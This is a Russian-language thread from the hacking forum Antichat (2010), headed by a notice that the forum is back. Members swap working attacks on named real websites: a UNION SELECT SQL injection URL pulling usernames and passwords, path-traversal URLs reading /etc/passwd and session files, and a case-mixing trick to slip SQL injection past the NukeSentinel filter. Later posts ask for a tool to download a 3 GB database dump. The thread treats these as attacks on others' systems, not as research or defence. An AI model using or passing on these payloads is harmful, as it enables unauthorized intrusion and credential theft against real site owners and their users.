Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

15.04.2010, 21:07
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
net ti zdelal concat_ws%28 username,0x3a,password%29
a vidimo tolko :jmvN/m90uBX8OHg
a eto sto login ili parol ?? a zacem tolko eto ?
|
|
|

15.04.2010, 21:09
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
ааааа
http://www.venen-kur.info/index.php?id=1319&lang=1+and+1=0+%20Union%20Select %20%20concat_ws%280x3a,username,0x3a,password%29,2 ,3,4%20from%20%20user_users--
я те ща в пм скину че там))
|
|
|

15.04.2010, 21:12
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
ok ponyatno..pasiba..
|
|
|

16.04.2010, 06:24
|
|
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме: 3896191
Репутация:
2562
|
|
Помогите плиз:
Вот php инъекция:
Код:
http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16
нашел там PHPSESSID он там j7h4hqb6d43c1f0e3bc84volf6
вбиваю
Код:
http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../tmp/sess_j7h4hqb6d43c1f0e3bc84volf6
ничего нет
в какой еще директории может быть файл сессии?
|
|
|

16.04.2010, 06:58
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Лучше вот это поизучай:
Код:
http://www.partnersinpreservation.com/boston/index.php?sec=/proc/self/status%00
http://www.partnersinpreservation.com/boston/index.php?sec=/etc/httpd/conf/httpd.conf%00
http://www.partnersinpreservation.com/boston/index.php?sec=/proc/version%00
https://forum.antichat.net/showpost.php?p=1088072&postcount=11
Последний раз редактировалось Pashkela; 16.04.2010 в 07:05..
|
|
|

16.04.2010, 19:32
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме: 117639
Репутация:
55
|
|
стандартная скуль
http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220% 27
но union и select режется модулем NukeSentinel
http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+ and+substring%28version%28%29,1,1%29=5
в подзапросах также режется select
как обойти?
|
|
|

16.04.2010, 19:56
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме: 1174919
Репутация:
229
|
|
Сообщение от durito
стандартная скуль
http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220% 27
но union и select режется модулем NukeSentinel
http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+ and+substring%28version%28%29,1,1%29=5
в подзапросах также режется select
как обойти?
Например так
Код:
http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=-220+unIoN+SeLeCt+1,2+--+
|
|
|

16.04.2010, 23:32
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
Кто может дать хорший и мощный скрипт што бы дамп БД на 3 гига слить, а то ошибки выдает с такими размерами!!
|
|
|

16.04.2010, 23:37
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
GOGA075,
Sypex Dumper скачай
|
|
|

16.04.2010, 23:44
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
jecka3000, вот как раз он то и выдает ошибки!!!
Что 1.0.8b и 2.0.6
несправляються с такими обьемами!!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|